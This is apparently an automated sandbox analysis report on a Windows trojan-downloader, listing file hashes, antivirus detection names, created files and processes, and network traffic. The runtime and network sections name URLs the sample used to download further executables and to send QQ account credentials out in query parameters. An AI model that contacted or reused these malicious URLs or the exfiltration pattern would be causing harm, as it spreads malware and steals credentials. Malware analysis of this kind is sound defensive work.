Analysis Date: 2014-07-04 20:33:37
MD5: 9ebf98564050a779bb66249b40c005e3
SHA1: 6f47b149bca16676f5c66f34d771d279284fd6f8

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 93fc79352eb6799e9ab947dbe246827b sha1: 502d8d079a983bdd919fee3e237a06707d9382a4 size: 217088
Section .rdata: md5: 4150f628f92482c5cc41763829bb04f0 sha1: 3c712f98177f7538d2a1372f319a6f86297442ad size: 24576
Section .data: md5: 8f973fc9b09c4c04f1fbe79aed81fa26 sha1: 2817e1dd7b0e3ba2528a0b54616ca229204ed9eb size: 126976
Timestamp: 2014-06-14 01:14:32
Packer: Microsoft Visual C++ v6.0
PEhash: f2dc2c742c24b933b514ff8221e40a90f2f906b1
IMPhash: 534fda370ef08cf84397228cb8db97a1
AV 360 Safe: Trojan.GenericKD.1722119
AV Ad-Aware: Trojan.GenericKD.1722119
AV Alwil (avast): no_virus
AV Arcabit (arcavir): no_virus
AV Authentium: no_virus
AV Avira (antivir): no_virus
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Trojan.StartPage1.677
AV Emsisoft: no_virus
AV Eset (nod32): Win32/Agent.WAQ
AV Fortinet: no_virus
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.GenericKD.1722119
AV Grisoft (avg): no_virus
AV Ikarus: Trojan-Downloader.Win32.Genome
AV K7: Trojan ( 0049ba3a1 )
AV Kaspersky: Trojan-Downloader.Win32.Genome.hqhq
AV MalwareBytes: no_virus
AV Mcafee: no_virus
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): no_virus
AV Norman: no_virus
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\WINDOWS\system\pczh.txt
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system\dudu.txt
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\Program Files\pczh_108_824.exe
Winsock URL: http://www.114lax.com/xin3/mail.asp?qqnumber= dianxinzhen&qqpassword= 6
Winsock URL: http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm7PJZ_v14.5.2.exe

Process
↳ C:\Program Files\pczh_108_824.exe

Network Details:

HTTP POST: http://kanboxshare.com/interface/publiclink.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
HTTP GET: http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm7PJZ_v14.5.2.exe
User-Agent: DownJet1.0
HTTP GET: http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm7PJZ_v14.5.2.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://down.shuyeer.net/dudu/dudu_b_55313.exe
User-Agent: DownJet1.0
HTTP GET: http://xz.fuzhicheng.com/new/pczh_108_824.exe
User-Agent: DownJet1.0
HTTP GET: http://www.114lax.com/xin3/mail.asp?qqnumber=%20dianxinzhen&qqpassword=%20%206
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Raw Pcap
Strings